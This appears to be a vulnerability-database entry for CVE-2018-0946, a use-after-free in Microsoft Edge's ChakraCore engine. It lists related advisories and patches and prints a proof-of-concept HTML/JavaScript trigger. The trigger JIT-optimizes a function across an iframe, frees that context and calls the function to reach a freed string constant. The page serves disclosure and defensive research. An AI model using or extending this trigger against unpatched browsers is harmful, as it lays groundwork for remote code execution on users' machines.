| Reporter | Title | Published | Views | Family All 48 |
|---|---|---|---|---|
| CVE-2018-0946 | 25 May 201800:00 | – | circl | |
| Microsoft ChakraCore and Edge Remote Code Execution Vulnerability (CNVD-2018-10208) | 9 May 201800:00 | – | cnvd | |
| Microsoft Edge Scripting Engine Memory Corruption (CVE-2018-0946) | 8 May 201800:00 | – | checkpoint_advisories | |
| CVE-2018-0946 | 9 May 201819:00 | – | cve | |
| CVE-2018-0946 | 9 May 201819:00 | – | cvelist | |
| EUVD-2022-4070 | 9 May 201819:00 | – | euvd | |
| EUVD-2022-5586 | 9 May 201819:00 | – | euvd | |
| ChakraCore RCE Vulnerability | 13 May 202201:18 | – | github | |
| May 8, 2018—KB4103721 (OS Build 17134.48) | 8 May 201807:00 | – | mskb | |
| May 8, 2018—KB4103727 (OS Build 16299.431) | 8 May 201807:00 | – | mskb |
<body>
<script>
let f = document.body.appendChild(document.createElement('iframe'));
let wrapped_dv = f.contentWindow.eval(`
function opt() {
return 'xxxx';
}
// Optimizing "opt", so that the address of 'xxxx' can be inlineed.
for (let i = 0; i < 100000; i++) {
opt();
}
let dv = new DataView(new ArrayBuffer(0));
dv.buffer.opt = opt;
dv;
`);
let buffer = DataView.prototype.__lookupGetter__('buffer').call(wrapped_dv);
let opt = buffer.opt;
f.onload = () => {
f.onload = null;
// Garbage collection
for (let i = 0; i < 10; i++)
new ArrayBuffer(1024 * 1024 * 40);
let obj = opt(); // "opt" returns the freed string constant.
alert(obj);
};
// Closing the diffrent context
f.src = 'about:blank';
</script>
</body>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation